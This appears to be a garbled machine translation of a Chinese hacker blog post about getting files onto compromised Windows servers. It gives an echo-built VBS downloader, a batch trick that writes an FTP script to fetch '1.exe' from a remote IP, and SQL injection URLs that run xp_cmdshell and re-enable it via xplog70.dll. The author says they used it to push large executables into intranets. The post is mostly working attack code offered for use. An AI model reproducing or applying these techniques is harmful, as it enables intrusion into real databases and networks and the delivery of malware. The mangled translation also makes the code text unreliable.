Source: Network of emotion: xiaolu
I wrote in the black brother blog, first quote black brother:
Quote:
文 / superhei solution: 1.iGet.vbs The contact in the VBS statement is the symbol is: So we should write to SET X = CreateObject ("Microsoft.xmlhttp"): X.Open "get", LCASE (WScript.Arguments (0)), 0: x.send (): SET S = CreateObject ("AdoDb.Stream": smode = 3: S.TYPE = 1: S.Open (): s. Write (x.responsebody): S.Savetofile Lcase (WScript.Arguments (1)), 2, we can succeed once, Echo version: echo set x = createObject (^ "Microsoft.xmlhttp ^": x.open ^ "Get ^", LCase (WScript.Arguments (0)), 0: x.send (): set s = createObject (^ "adoDb.stream ^"): smode = 3: S.TYPE = 1: s .Open (): s.write (x.responsebody): S.Savetofile Lcase (WScript.Arguments (1)), 2> iGet.vbs 2.BAT calls FTP scripts Writing (by envymask) Echo ftp> 1.vbs Echo open ip> 2.vbs echo u> 3.vbs echo s> 4.vbs echo binary> 5.vbs echo get 1.exe> 6.VBS Echo Bay> 7.vbs Copy 1.vbs 2.VBS 3 .vbs 4.VBS 5.VBS 6.VBS 7.VBS New.vbs
Talk about my solution:
http://xxx.com/x.asp?id=1 ;exec master..xp_cmdshell 'echo xxxx1> xxx.vbs'; exec master..sp_dropextendedProc 'xp_cmdshell' - http: //xxx.com/x. ASP? ID = 1; Use master dbcc addextendedProc ('xp_cmdshell', 'xplog70.dll') - http: //xxx.com/x.asp? id = 1; exec master..xp_cmdshell 'echo xxxx2 >> XXX .vbs'; Exec master..sp_dropextendedProc 'xp_cmdshell' - http: //xxx.com/x.asp? id = 1; Use master dbcc addextendedProc ('xp_cmdshell', 'xplog70.dll') --...
The principle is very clear, I wrote SQLComm.exe to use this principle to make the command only once, this passing through my strict test, I used to echo over more than 100 K files (Exe2bat generated files) to the intranets, Successfully use Debug's restore to EXE, it is recommended to cooperate with the exe2vbs I wrote, huh, 512 characters per line, try to do the least line, recently nonsense, and hit this.
